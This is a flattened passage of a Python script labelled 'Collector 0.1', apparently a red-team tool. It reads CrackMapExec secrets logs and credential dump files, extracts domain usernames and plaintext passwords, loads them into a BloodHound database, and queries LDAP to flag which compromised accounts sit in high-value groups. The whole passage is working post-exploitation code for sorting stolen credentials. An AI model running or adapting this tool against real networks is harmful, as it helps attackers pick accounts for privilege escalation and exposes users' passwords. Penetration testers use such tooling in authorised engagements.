pypylogger.setLevel(100) 312 | 313 | # Create top level logger 314 | mainlog = logging.getLogger("collector") 315 | 316 | # Add console handler using our custom ColoredFormatter 317 | ch = logging.StreamHandler() 318 | 319 | ch.setLevel(logging.DEBUG) 320 | 321 | cf = ColoredFormatter("[%(levelname)s] %(message)s") 322 | ch.setFormatter(cf) 323 | 324 | mainlog.addHandler(ch) 325 | 326 | # Set log level 327 | mainlog.setLevel(logging.DEBUG) 328 | mainlog.propagate = False 329 | 330 | if __name__ == '__main__': 331 | 332 | ascii = """ 333 | ,.--'`````'--., 334 | (\'-.,_____,.-'/) 335 | \\-.,_____,.-//| 336 | ;\\ // | 337 | | \\ ___ // | 338 | | '-[___]-' | 339 | | | 340 | | | 341 | | | 342 | `'-.,_____,.-'' 343 | """ 344 | 345 | if sys.version_info<(3,5,0): 346 | mainlog.error("You need python 3.5 or later to run this script\n") 347 | sys.exit(1) 348 | 349 | try: 350 | args = cmdline_args() 351 | #print(args) 352 | print(ascii) 353 | mainlog.info("Collector 0.1 by ~Flangvik ") 354 | 355 | compromised_users = [] 356 | lsassDump = False 357 | #Get the config 358 | yamlConfig = get_config('') 359 | 360 | while True: 361 | #Should we parse CME? 362 | if args.cme: 363 | #Check if the cme logs dir is there 364 | if path.exists(os.path.expanduser('~') + "/.cme/logs"): 365 | mainlog.info("Parsing CME log files") 366 | 367 | #Parse all secrets 368 | for file in glob.glob(os.path.expanduser('~') + "/.cme/logs/*.secrets"): 369 | inputFile = open(file,"r+") 370 | inputDataRaw = inputFile.read() 371 | 372 | #Decent regex 373 | validCreds = re.findall(r'(?!.*:aes|.*:plain_password_hex:|.*des-cbc-md5:)[a-zA-Z0-9\-\.]{0,15}\\.*:.*\n',inputDataRaw) 374 | 375 | #Uniq them 376 | validUniq = list(set(validCreds)) 377 | 378 | #Parse them into the global dict 379 | for letter in validUniq: 380 | user_dict = {} 381 | 382 | #print(letter) 383 | user_dict["domain"] = letter.split('\\')[0].upper() 384 | 385 | user_dict["username"] = letter.split('\\')[1].split(":")[0] 386 | 387 | user_dict["password"] = letter.split('\\')[1].split(":")[1].lstrip().rstrip() 388 | 389 | compromised_users.append(user_dict) 390 | 391 | else: 392 | mainlog.error("Could not find CrackMapExec logs directory!") 393 | 394 | if args.inputData: 395 | for inputPath in args.inputData: 396 | ##If the path is a directory 397 | if os.path.isdir(inputPath): 398 | mainlog.debug(f"Reading files from {inputPath}") 399 | for file in glob.glob(inputPath + "/*.*"): 400 | mainlog.debug(f"Reading {file}") 401 | compromised_users += parseFile(file,yamlConfig) 402 | else: 403 | compromised_users += parseFile(inputPath,yamlConfig) 404 | 405 | #Stolen from https://stackoverflow.com/questions/11092511/list-of-unique-dictionaries 406 | uniq_compromised_users = list({v['username']:v for v in compromised_users}.values()) 407 | for user_dict in uniq_compromised_users: 408 | 409 | if(args.verbose): 410 | mainlog.debug(f'Account compromised: {user_dict["domain"]}\{user_dict["username"]}:{user_dict["password"]}') 411 | 412 | mainlog.debug(f'{len(uniq_compromised_users)} accounts compromised') 413 | 414 | if args.blood: 415 | 416 | update_database( 417 | uniq_compromised_users, 418 | yamlConfig['neo4j_url'], 419 | yamlConfig['neo4j_username'], 420 | yamlConfig['neo4j_password'], 421 | ) 422 | 423 | #Stolen from https://github.com/shellster/LDAPPER 424 | if args.ldap: 425 | mainlog.info("Querying LDAP for high priv users") 426 | 427 | Engine = None 428 | Engine = ImpacketLDAPConnector 429 | 430 | with Engine(yamlConfig['ldap_server'], 3, yamlConfig['ldap_domain'], yamlConfig['ldap_username'], yamlConfig['ldap_password'],'', 10, 2, 0) as engine: 431 | for user in compromised_users: 432 | try: 433 | searchQuery = '(&(objectclass=user)(|(CN=' + user['username'] + ')(sAMAccountName=' + user['username'] + ')))' 434 | if '$' in user['username']: 435 | searchQuery = '(&(objectclass=computer)(|(CN=' + user['username'] + ')(sAMAccountName=' + user['username'] + ')))' 436 | 437 | searchFilter = ['cn', 'description', 'mail', 'memberOf', 'sAMAccountName'] 438 | records_found = False 439 | 440 | for i, record in enumerate(engine.search(searchQuery, searchFilter)): 441 | records_found = True 442 | for group in record['memberof']: 443 | groupName = group.split('=')[1].split(',')[0] 444 | if groupName is not None: 445 | if groupName in yamlConfig['high_value_groups']: 446 | mainlog.debug(f"User {user['username']} is a member of high value group {groupName}") 447 | 448 | mainlog.debug(f"Username {user['username']} Password: {user['password']}") 449 | 450 | if records_found == False: 451 | mainlog.warning(f"Could not find data for user {user['username']}") 452 | 453 | 454 | except Exception as ex: 455 | mainlog.error(f'Error: {ex}') 456 | if args.watch: 457 | compromised_users = [] 458 | sleep(args.watch) 459 | else: 460 | sys.exit(0) 461 | 462 | except Exception as ex: 463 | mainlog.error(f'Error: {ex}') 464 | sys.exit(1) 465 | 466 | --------------------------------------------------------------------------------